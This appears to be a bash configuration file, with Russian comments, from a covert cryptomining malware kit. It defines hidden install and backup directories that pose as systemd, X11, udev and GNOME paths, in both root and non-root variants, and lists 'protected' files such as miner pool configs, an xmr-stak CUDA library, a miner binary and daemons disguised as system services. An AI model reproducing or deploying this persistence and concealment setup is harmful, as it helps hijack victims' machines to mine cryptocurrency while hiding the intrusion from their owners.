# Файл: 1.config-sync
# ПРИВИЛЕГИРОВАННЫЕ ПУТИ (Требуют SUDO)
declare -r PRIV_INSTALL_DIR="/opt/.new-systemd-data"
declare -a PRIV_BACKUP_LOCATIONS=([0]="/usr/local/share/.sys-cache" [1]="/var/lib/.X11-sys-data" [2]="/etc/.udev-daemon-config")

# НЕПРИВИЛЕГИРОВАННЫЕ ПУТИ (Не требуют SUDO)
declare -r UNPRIV_INSTALL_DIR="$HOME/.local/state/gnome-sync-cache"
declare -a UNPRIV_BACKUP_LOCATIONS=([0]="$HOME/.cache/new-session-data" [1]="/tmp/.X11-temp-proc" [2]="$HOME/.config/app-backup-store")

# ОБЩИЕ ПАРАМЕТРЫ ФАЙЛОВ: Включает новое имя файла конфигурации и оба исполняемых файла
declare -ar PROTECTED_FILES=([0]="1.config-sync" [1]="kernel-sync-daemon" [2]="gnome-shell-ext-updater" [3]="dbus-session-monitor" [4]="sys-protect-proc" [5]="session-mgr-service" [6]="miner-pools.txt" [7]="miner-config.txt" [8]="cpu.txt" [9]="nvidia.txt" [10]="libxmrstak_cuda_backend.so" [11]="lmmiineeer")
declare -r DAEMON_NAME="kernel-sync-daemon"
